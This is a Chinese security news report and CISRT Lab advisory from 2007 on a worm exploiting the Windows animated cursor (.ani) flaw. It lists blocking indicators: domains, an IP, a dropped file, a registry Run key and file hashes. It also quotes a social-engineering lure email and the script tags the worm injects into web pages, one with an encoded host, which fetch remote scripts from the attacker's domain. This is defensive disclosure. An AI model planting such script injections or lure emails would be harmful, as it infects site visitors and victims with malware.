光标漏洞的复合型蠕虫现身 Vista操作系统曝出首个重大漏洞

光标漏洞的复合型蠕虫现身 Vista操作系统曝出首个重大漏洞

3月30日，微软Vista操作系统曝出首个重大漏洞。昨天，瑞星反病毒专家发现该漏洞已经开始被黑客利用，使用Windows Vista和XP的用户，在访问带毒网站时会被威金病毒、盗号木马(木马查杀软件下载)等多种病毒感染。据监测，国内已有近十个网站被黑客攻陷。

此前，微软公司曾发出警告称，攻击者正在积极利用Windows动画光标(.ani)文件中一个未修复漏洞。这个漏洞将影响Windows XP以上操作系统和IE6以上的浏览器，微软最新的Vista和IE7都不能幸免。目前微软还没有发布此漏洞的补丁。

据瑞星安全专家介绍，ANI文件是Windows鼠标动态光标文件，由于Vista等系统在处理ANI文件的方式上存在漏洞，黑客可以构造特殊格式的ANI文件，当用户浏览含有该文件的网页，或点击该文件就会自动下载运行黑客指定的病毒、木马及后门程序等。目前利用该漏洞的病毒中，威金（Worm.Viking）变种及窃取网络游戏的木马病毒占多数。

这是Vista系统第一次曝出重大漏洞，利用该漏洞传播病毒的网站数量正逐步增多，攻击代码很可能已经公开。

安全专家提醒普通网民不要轻易登陆陌生网站，尤其是通过电子邮件、聊天软件等发送来的陌生网址。网站的管理员，应该加强对自己服务器日志的管理，尤其要注意不明来源的ANI及JPG等格式图片文件，一旦出现异常尽快处理。

------------------C.I.S.R.T.信息------------------

一个非常不好的消息要告诉大家，利用微软动画光标漏洞的新蠕虫已经现身。我们收到了相关的样本，通过分析，我们已经确认这是一个复合型蠕虫，含有类似熊猫烧香的感染功能、下载其他病毒的功能、发送含有最新.ani漏洞网址邮件的功能、感染html等文件并向这些文件里添加含有最新漏洞网址的功能。由于危险程度非常高，CISRT Lab决定再次发布中度风险警报，提醒广大网友提高警惕！

同时我们建议广大网友、企业网管对以下两个域名和IP进行屏蔽：

2007ip.com
microfsot.com
61.153.247.76

蠕虫的大小在13K左右，会释放文件到以下目录：

%SYSTEM%\sysload3.exe

添加注册表键值：

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"

会发送邮件：

From: i_lov e_cq@sohu. com
Subject:你和谁视频的时候被拍下的？给你笑死了！
Body:
看你那小样！我看你是出名了！
你看这个地址！你的脸拍的那么清楚！你变明星了！
http://macr.micr of  sot.com/<remove d>/134952.htm

感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件，并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码：

<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%6   1%63 %72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>

注意邮件和网页中提到的网址中都含有.ani 0-day漏洞的恶意文件。

Kaspersky检测为Trojan-Downloader.Win32.Agent.bky，毒霸命名为Worm.MyInfect

目前我们收到样本的MD5值为

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179

2007.3.31 22:45第一次更新：

作者在蠕虫体内表达了对Kaspersky的不满